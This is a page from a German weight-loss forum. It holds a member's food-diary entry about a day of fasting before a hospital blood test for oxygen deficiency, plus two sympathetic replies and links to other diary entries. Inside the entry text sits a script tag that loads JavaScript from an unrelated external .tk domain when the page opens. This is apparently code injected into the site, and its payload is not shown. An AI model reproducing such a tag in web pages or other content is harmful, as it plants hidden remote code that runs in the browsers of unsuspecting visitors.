Zum Inhalt springen

Sie sind hier

22.08.2014 mußte heute zum Aderlass

0  0
Am von im Ernährungstagebuch geschrieben

,d.h. es agb gerade mal heute morgen eine Tasse Kaffee,denn ich mußte zum großen Blutbild,wegen Don. da muß ich für 5 Stunden

ins Krankenhaus - um zu Prüfen wo der Sauerstoffmangel im Blut her kommt ( ob vom Herz ) Biggrin

Mittag - einen Shake und eine Nektarine

Abend - eine leckere Gemüsepfanne mit Putenfleisch und Feta überpacken

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Vorheriger Ernährungstagebuch-Eintrag
Bild von Das Kleid ist da
Nächster Ernährungstagebuch-Eintrag
Bild von Tabbimaus Etappenziel geschafft - U80

Kommentare

Bild des Benutzers LunaTheCat
0  0

"Abend - eine leckere Gemüsepfanne mit Putenfleisch und Feta überpacken"

Sowas könnte ich auch mal wieder essen Biggrin Nächste Woche wird bei mir auch wieder selbst gekocht Smile 

Ich hoffe, man findet bald nen Grund für deinen Sauerstoffmangel und kann den dann gut behandeln Smile 

Alles Gute von mir! 

 

Bild des Benutzers Emma09
0  0

Oh Danke Luna - ich hoffe das auch,das endlich mal eine Ursache gefunden wird I-m so happy

befürchte aber schon das schlimmste,ist bei mir ja seit 2007 immer so,das mir ein Stenz engesetzt werden muß Biggrin

 

wünsche dir einen schönen Samstagabend

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von kortes: genau das hab ich mir gesagt am Mittwoch. Was soll's. Schließlich muss der Mensch auch mal feiern. Also Diät beiseite und los gehts. Geburtstagskuchen, Sekt, Süßkram und Gegrilltes, Käse, Kaffee,...
Eintrag in ein Ernährungstagebuch von veilchen: Meine Lieben. Was soll ich sagen, ich hatte ja die letzte Woche diesen Mageninfekt "den bei uns alle hatten". (ha. na das wäre komisch...) Ich scheinbar nicht. Ich habe nämlich einen kleinen...
Eintrag in ein Ernährungstagebuch von Juergen12053: Essen: Fühstück zwei Brotscheiben und 1/3 Salatgurke, Mittag zwei Buletten, eine rote Paprika, Nachmittag hunger auf Süßes - Joghurt mit Marmelarde und drei Pfirsiche, Abend reichlich Gurkensalat mit...
Eintrag in ein Ernährungstagebuch von Juergen12053: Ennährungs- und Bewegungstagebuch für den 20.08.17 Gegessen habe ich zum Frühstück ein Brötchen und eine Scheibe Brot mit Belag und Tomate, Mittags einen Pfirsich, Abendessen Grillen zwei Stück...
Eintrag in ein Ernährungstagebuch von Ingekarin70: Ich bin sehr froh; denn ich kann eine weitere Abnahme verzeichnen. Zur Zeit fühle ich mich super, und ich hoffe, es geht Euch genauso. Es grüßt Euch Inge Karin
Eintrag in ein Ernährungstagebuch von veilchen: Samstag Frühstück Vollkornpancakes mit Waldbeeren Mittags eine Bratwurstsemmel (ohja. die war echt ssuuuuuperlecker, da habe ich mich die ganze Woche drauf gefreut) Abends Vollkornpizza (über die...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst